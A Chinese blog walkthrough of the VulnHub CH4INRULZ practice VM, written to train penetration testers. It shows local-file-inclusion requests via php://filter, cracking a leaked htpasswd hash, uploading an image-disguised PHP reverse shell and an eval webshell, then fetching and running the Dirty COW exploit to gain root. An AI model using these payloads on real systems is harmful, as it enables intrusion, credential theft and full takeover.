靶场vulnhub-CH4INRULZ_v1.0.1通关

1.CH4INRULZ_v1.0.1靶场通关

ch4inrulz是vulnhub下的基于Linux的一个靶场,作为练习之用

目的:通过各种手段,获取到靶机内的flag的内容

2.环境搭建:

攻击机 Kali 192.168.31.51
靶机  Ubuntu 192.168.31.128

2.1下载CH4INRULZ_v1.0.1靶场,地址:https://download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova

2.2将下载好的.ova扩展名的文件,直接用vm或者vbox虚拟机打开即可,会自动导入配置,打开虚拟机,会进入Ubuntu的登录界面

这里需注意的是,在打开靶机之前,需要把网络设置为桥接或者NAT
还有一点就是,因为不需要对靶机进行登录操作,所以不要去纠结没有登录密码什么的

3.正式开始测试

3.1靶机配置

本人的靶机网卡配置为NAT模式,并启用DHCP,通过查看靶机的虚拟机配置下的网卡mac地址,或结合nmap对虚拟机的NAT网段进行主机扫描,如下,使用排除法轻松获取靶机ip是192.168.31.128/24

┌──(root💀kali)-[~]
└─# nmap -sV 192.168.31.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-01 09:54 CST
Nmap scan report for 192.168.31.1
Host is up (0.00056s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE         VERSION
443/tcp  open  ssl/https       VMware Workstation SOAP API 16.1.2
902/tcp  open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp  open  vmware-auth     VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
5357/tcp open  http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00:50:56:C0:00:08 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:vmware:Workstation:16.1.2, cpe:/o:microsoft:windows

Nmap scan report for 192.168.31.128
Host is up (0.0046s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 00:0C:29:E9:EB:3A (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

3.2端口扫描

对靶机192.168.31.128进行端口扫描,确认其开放的端口,开启的服务,这里使用nmap版本探测

┌──(root💀kali)-[~]
└─# nmap -sV 192.168.31.128 #探测开启的端口获取服务和版本信息
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-01 11:36 CST
Nmap scan report for 192.168.31.128
Host is up (0.00088s latency).
2. Not shown: 996 closed ports1.
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 00:0C:29:E9:EB:3A (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.93 seconds



#nmap的 -A 参数,意思是一次性扫描包含系统探测 本部探测 脚本扫描和跟踪扫描,获取到的信息更详细

┌──(root💀kali)-[~]
└─# nmap -sV -A 192.168.31.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-01 16:17 CST
Nmap scan report for 192.168.31.128
Host is up (0.00050s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.31.51
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
|   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
|_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: FRANK's Website | Under development
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:E9:EB:3A (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.19 - 2.6.36
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 192.168.31.128

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.78 seconds

端口扫描小结

到这一步可以得知,靶机开启了4个端口,分别是FTP(21),SSH(22),HTTP(80),HTTP(8011),并且配置了APACHE中间件作为服务端解析器,这里可以猜测大概率使用的是php语言,

3.3手工对端口验证和信息整理

FTP服务

FTP提示Anonymous FTP login allowed ,允许匿名登录,登录名为:anonymous,密码为空,但没发现有价值的信息

┌──(root💀kali)-[~]
└─# ftp 192.168.31.128
Connected to 192.168.31.128.
220 (vsFTPd 2.3.5)
Name (192.168.31.128:gaobo): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        111          4096 Apr 13  2018 .
drwxr-xr-x    2 0        111          4096 Apr 13  2018 ..
226 Directory send OK.

Web服务:80,8011端口

http://192.168.31.128/
#直接可以打开访问,是个人网站,个人简历之类的

http://192.168.31.128:8011/
#提示Development Server !

分别对靶机的80,8011端口进行目录扫描,期望获得有价值的文件信息,这里使用7kb,和破壳同时扫描,结果如下:

23.存在该资源 http://192.168.31.128:8011/api
41.存在该资源 http://192.168.31.128/index.html.bak

8011端口

浏览器访问 http://192.168.31.128:8011/api
发现提示:
This API will be used to communicate with Frank's server
but it's still under development

* web_api.php

* records_api.php

* files_api.php

* database_api.php、、
说明有4个API接口

经过尝试挨个访问,只有files_api.php存在,其它都显示404。

http://192.168.31.128:8011/api/files_api.php显示:No parameter called file passed to me* Note : this API don't use json , so send the file name in raw format这里的意思是files_api.php后面需要接参数

随便用file作为参数测试了一下,被拦截,并记录IP,GET方式被拦截,下面用POST方式试试
http://192.168.31.128:8011/api/files_api.php?file=xxxx

******* HACKER DETECTED *********YOUR IP IS : 192.168.31.1WRONG INPUT !!
发现文件包含漏洞

Burp抓包,改为Post请求,php伪协议读一下files_api.php文件内容,

POST /api/files_api.php HTTP/1.1
Host: 192.168.31.128:8011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
file=php://filter/convert.base64-encode/resource=files_api.php

对读到的内容进行base64解码

:
<head>
  <title>franks website | simple website browser API</title>
</head>

<?php


$file = $_POST['file'];
include($file);
$get_file = $_GET['file'];

if(isset($get_file)){

echo "<b>********* HACKER DETECTED *********</b>";
echo "<p>YOUR IP IS : ".$_SERVER['REMOTE_ADDR'];
echo "</p><p>WRONG INPUT !!</p>";
break;
}


if(!isset($file)){

echo "<p>No parameter called file passed to me</p>";
echo "<p>* Note : this API don't use json , so send the file name in raw format</p>";

}

/** else{
echo strcmp($file,"/etc/passwd");
echo strlen($file);
echo strlen("/etc/passwd");
if($file == "/etc/passwd"){
        "HACKER DETECTED ..";
        }
}**/

?>

发现源码中禁止以GET形式读etc/passwd文件,其他的文件也读不到了

发现存在目录遍历漏洞

继续构造Post请求,使用伪协议查看/etc/passwd ,发现存在目录遍历漏洞,

POST /api/files_api.php HTTP/1.1
Host: 192.168.31.128:8011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

file=/etc/passwd

获取到信息如下,发现一个frank用户,结合后面继续看

root:x:0:0:root:/root:/bin/bash
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
**frank:x:1000:1000:frank,,,:/home/frank:/bin/bash**
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false

80端口

发现敏感信息泄露

http://192.168.31.128/index.html.bak,这个应该是网页开发的时候留下的备份文件,经去掉bak后缀,手动打开index.html,查看源代码发现如下;

<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>

这里发现了敏感信息:frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0,这应该是一个登录名和加密后的登录密码

暴力破解口令

使用kali下的john工具,对 "frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0" 进行弱口令爆破,

John用法:john <filename>

创建文件,使用VIM将内容:frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 保存

┌──(root💀kali)-[~]
└─# touch frank.txt
└─# vim ./frank.txt 
└─# cat ./frank.txt       
frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

┌──(root💀kali)-[~]
└─# john ./frank.txt                                   
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
frank!!!         (frank)
1g 0:00:00:00 DONE 1/3 (2021-09-01 16:02) 100.0g/s 19200p/s 19200c/s 19200C/s Frank8..1frank
Use the "--show" option to display all of the cracked passwords reliably
Session completed

成功获取到frank用户的密码:frank!!!

继续看 index.html.bak,发现还有一个目录development

<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->

所有,尝试去访问 http://192.168.31.128/development/,发现需要登陆,
使用上一步破解的登录名,frank和frank!!!,发现登陆成功,显示为:

Here is my unfinished tools listthe uploader tool (finished but need security review)
发现文件上传点

接着回显的英文提示信息,拼接uploader构造一个URL:http://192.168.31.128/development/uploader/ 打开发现是一个上传文件的界面,下面有提示

 TODO : script security "50% FINISHED"  安全性50%,说明肯定是存在文件上传漏洞的

通过上传测试,发现上传.jpg的图片文件可以成功上传,提示保存成功,其他的则不行

File is an image - image/jpeg.The file icon.jpg has been uploaded to my uploads path. 

File is not an image.Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded. #只能上传图片格式的文件

利用文件包含漏洞读上传页面源码进行审计

接下来准备尝试上传webshell,但发现一般的图片木马不能直接上传,说明服务端存在扩展名和文件内容检测

先利用上一步得到的文件包含漏洞,使用PHP伪协议php://filter/convert.base64-encode/resource=

读一下文件上传页面(upload.php)php代码,并看能不能找到上传的文件在服务器保存的目录,否则即使上传成功,找不到目录也是无法访问
根据经验,一般网站都在/var/www/html 目录下

经过测试发现 80 端口的网站在/var/www/目录下

利用 8011 端口发现的文件包含漏洞,读 upload.php。看看服务器是怎么处理的。

POST /api/files_api.php HTTP/1.1
Host: 192.168.31.128:8011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php

得到结果为base64编码的字符串
PD9waHAKJHRhcmdldF9kaXIgPSAiRlJBTkt1cGxvYWRzLyI7CiR0YXJnZXRfZmlsZSA9ICR0YXJnZXRfZGlyIC4gYmFzZW5hbWUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSk7CiR1cGxvYWRPayA9IDE7CiRpbWFnZUZpbGVUeXBlID0gc3RydG9sb3dlcihwYXRoaW5mbygkdGFyZ2V0X2ZpbGUsUEFUSElORk9fRVhURU5TSU9OKSk7Ci8vIENoZWNrIGlmIGltYWdlIGZpbGUgaXMgYSBhY3R1YWwgaW1hZ2Ugb3IgZmFrZSBpbWFnZQppZihpc3NldCgkX1BPU1RbInN1Ym1pdCJdKSkgewogICAgJGNoZWNrID0gZ2V0aW1hZ2VzaXplKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJ0bXBfbmFtZSJdKTsKICAgIGlmKCRjaGVjayAhPT0gZmFsc2UpIHsKICAgICAgICBlY2hvICJGaWxlIGlzIGFuIGltYWdlIC0gIiAuICRjaGVja1sibWltZSJdIC4gIi4iOwogICAgICAgICR1cGxvYWRPayA9IDE7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkZpbGUgaXMgbm90IGFuIGltYWdlLiI7CiAgICAgICAgJHVwbG9hZE9rID0gMDsKICAgIH0KfQovLyBDaGVjayBpZiBmaWxlIGFscmVhZHkgZXhpc3RzCmlmIChmaWxlX2V4aXN0cygkdGFyZ2V0X2ZpbGUpKSB7CiAgICBlY2hvICJTb3JyeSwgZmlsZSBhbHJlYWR5IGV4aXN0cy4iOwogICAgJHVwbG9hZE9rID0gMDsKfQovLyBDaGVjayBmaWxlIHNpemUKaWYgKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJzaXplIl0gPiA1MDAwMDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgaXMgdG9vIGxhcmdlLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIEFsbG93IGNlcnRhaW4gZmlsZSBmb3JtYXRzCmlmKCRpbWFnZUZpbGVUeXBlICE9ICJqcGciICYmICRpbWFnZUZpbGVUeXBlICE9ICJwbmciICYmICRpbWFnZUZpbGVUeXBlICE9ICJqcGVnIgomJiAkaW1hZ2VGaWxlVHlwZSAhPSAiZ2lmIiApIHsKICAgIGVjaG8gIlNvcnJ5LCBvbmx5IEpQRywgSlBFRywgUE5HICYgR0lGIGZpbGVzIGFyZSBhbGxvd2VkLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIENoZWNrIGlmICR1cGxvYWRPayBpcyBzZXQgdG8gMCBieSBhbiBlcnJvcgppZiAoJHVwbG9hZE9rID09IDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgd2FzIG5vdCB1cGxvYWRlZC4iOwovLyBpZiBldmVyeXRoaW5nIGlzIG9rLCB0cnkgdG8gdXBsb2FkIGZpbGUKfSBlbHNlIHsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bInRtcF9uYW1lIl0sICR0YXJnZXRfZmlsZSkpIHsKICAgICAgICBlY2hvICJUaGUgZmlsZSAiLiBiYXNlbmFtZSggJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSkuICIgaGFzIGJlZW4gdXBsb2FkZWQgdG8gbXkgdXBsb2FkcyBwYXRoLiI7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIlNvcnJ5LCB0aGVyZSB3YXMgYW4gZXJyb3IgdXBsb2FkaW5nIHlvdXIgZmlsZS4iOwogICAgfQp9Cj8+Cgo=

对读到的内容进行base64解码:

$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>
成功发现上传文件的保存目录

在这一步得到了文件上传页面upload.php的代码,发现上传的文件保存在目录FRANKuploads/

即:http://192.168.31.128/development/uploader/FRANKuploads/,可以访问上传的所有文件的目录

上传Webshell

这里使用Kali自带的PHP反向连接马,目录如下,/usr/share/webshells/php/php-reverse-shell.php

修改IP为攻击机的ip,最后扩展名改为kali.jpg,然后抓包上传,在BURP修改文件头为GIF89a,发现成功上传

先在攻击机执行nc监听

nc -lvvp 1234                                                                                   1 ⨯listening on [any] 1234 ...

在burp里利用文件包含漏洞直接去访问上传的kali.jpg木马

POST /api/files_api.php HTTP/1.1
Host: 192.168.31.128:8011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

file=/var/www/development/uploader/FRANKuploads/kali.jpg

发现成功反弹了shell,不过不是root用户,属于普通用户

┌──(root💀kali)-[/usr/share/webshells/php]
└─# nc -lvvp 1234                                                                                   1 ⨯
listening on [any] 1234 ...
192.168.31.128: inverse host lookup failed: Unknown host
connect to [192.168.31.51] from (UNKNOWN) [192.168.31.128] 47666
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
 17:59:14 up 15:16,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
$ uname -a
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux

这里,还有一个思路,使用同样的方法上传包含一句话的图片马,配合蚁剑也可以拿到shell,如下:

caidao.gif<?php @eval($_POST[pass]);?>

蚁剑添加数据如下,发现成功连接

URL地址:http://192.168.31.128:8011/api/files_api.php
连接密码:pass

请求信息栏--http body
Name:file
Value:/var/www/development/uploader/FRANKuploads/caidao.gif

通过自带的虚拟终端可以执行linux命令和查看目录,由于属于普通用户,需要进行提权

4.脏牛提权

发现linux内核是 2.6.35

Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复),使用脏牛(CVE-2016-5195)提权
低权限用户利用该漏洞可以在众多Linux系统上实现本地提权

在攻击机开启web服务,比如 apache 服务,然后在github下载脏牛提权文件dirty.c,地址:https://github.com/FireFart/dirtycow

把文件dirty.c放在攻击机的/var/www/html/目录下

┌──(root💀kali)-[/var/www/html]
└─# service apache2 restart
┌──(root💀kali)-[/var/www/html]
└─# netstat -lntup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      587/sshd: /usr/sbin 
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      655/postgres        
tcp6       0      0 :::22                   :::*                    LISTEN      587/sshd: /usr/sbin 
tcp6       0      0 ::1:5432                :::*                    LISTEN      655/postgres        
tcp6       0      0 :::80                   :::*                    LISTEN      12743/apache2   

接着在靶机发现只有tmp目录有可写权限,所以进入/tmp目录下,使用wget下载攻击机上的脏牛提权文件dirty.c,并再在靶机执行gcc编辑为dirty(注意:这里一定要上传到靶机上在进行gcc编译,不能在别的机器编译再好传过来)

www-data@ubuntu:/$ ls -l
ls -l
total 88
drwxr-xr-x   2 root  root   4096 Apr 13  2018 bin
drwxr-xr-x   3 root  root   4096 Apr 13  2018 boot
drwxr-xr-x  16 root  root   4040 Sep  1 02:43 dev
drwxr-xr-x  78 root  root   4096 Sep  2 09:45 etc
drwxr-xr-x   3 root  root   4096 Apr 13  2018 home
lrwxrwxrwx   1 root  root     33 Apr 13  2018 initrd.img -> boot/initrd.img-2.6.35-19-generic
drwxr-xr-x  15 root  root  12288 Apr 14  2018 lib
drwxr-xr-x   2 root  root   4096 Apr 13  2018 lib64
drwx------   2 root  root  16384 Apr 13  2018 lost+found
drwxr-xr-x   4 root  root   4096 Apr 13  2018 media
drwxr-xr-x   3 root  root   4096 Apr 13  2018 mnt
drwxr-xr-x   2 root  root   4096 Apr 13  2018 opt
dr-xr-xr-x 129 root  root      0 Sep  1 02:43 proc
drwx------   4 root  root   4096 Apr 14  2018 root
drwxr-xr-x   2 root  root   4096 Apr 13  2018 sbin
drwxr-xr-x   2 root  root   4096 May  9  2010 selinux
drwxr-xr-x   3 root  root   4096 Apr 13  2018 srv
drwxr-xr-x  13 root  root      0 Sep  1 02:43 sys
drwxrwxrwt   4 root  root   4096 Sep  2 09:46 tmp
drwxr-xr-x  10 root  root   4096 Apr 13  2018 usr
drwxr-xr-x  16 frank frank  4096 Apr 14  2018 var
www-data@ubuntu:/$ cd /tmp
www-data@ubuntu:/tmp$ wget http://192.168.31.51/dirty.c
wget http://192.168.31.51/dirty.c
--2021-09-02 09:51:18--  http://192.168.31.51/dirty.c
Connecting to 192.168.31.51:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4815 (4.7K) [text/x-csrc]
Saving to: `dirty.c'
100%[======================================>] 4,815       --.-K/s   in 0s
2021-09-02 09:51:18 (524 MB/s) - `dirty.c' saved [4815/4815]
www-data@ubuntu:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@ubuntu:/tmp$ ls -l
ls -l
total 36
drwxrwxrwt 2 root     root      4096 Sep  1 02:43 VMwareDnD
-rw-r--r-- 1 root     root      1860 Sep  1 02:43 _cafenv-appconfig_
-rwxrwxrwx 1 www-data www-data 14116 Sep  2 09:51 dirty
-rw-rw-rw- 1 www-data www-data  4815 Apr 24  2017 dirty.c
drwx------ 2 root     root      4096 Sep  2 09:49 vmware-root

然后正式开始脏牛提权,这里会提示输入新密码:123456,然后需要多等等一会,就会提示成功的字样

$ ./dirty
Please enter the new password: 123456
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash

mmap: 7f3c94f58000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash

mmap: 7f3c94f58000
madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

使用xhell连接,账号:firefart 123456,发现已经是root账户了

firefart@ubuntu:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@ubuntu:~# cat root.txt 
8f420533b79076cc99e9f95a1a4e5568

最后成功发现flag,内容为8f420533b79076cc99e9f95a1a4e5568
到这一步就结束了。

总结:

1、前期的信息收集很重要,这一步直接后决定后面的工作展开的广度和深度,越详细越好,并进行判断
2、这个靶场把文件包含和文件上传结合了起来,一个不错的思路,可以练习利用文件包含读文件,查看信息等
3、目录扫描,可以考虑使用多个工具,一个扫描器可能扫描的信息不完整

posted @ 2021-09-05 22:29  广陌道人  阅读(511)  评论(0编辑  收藏  举报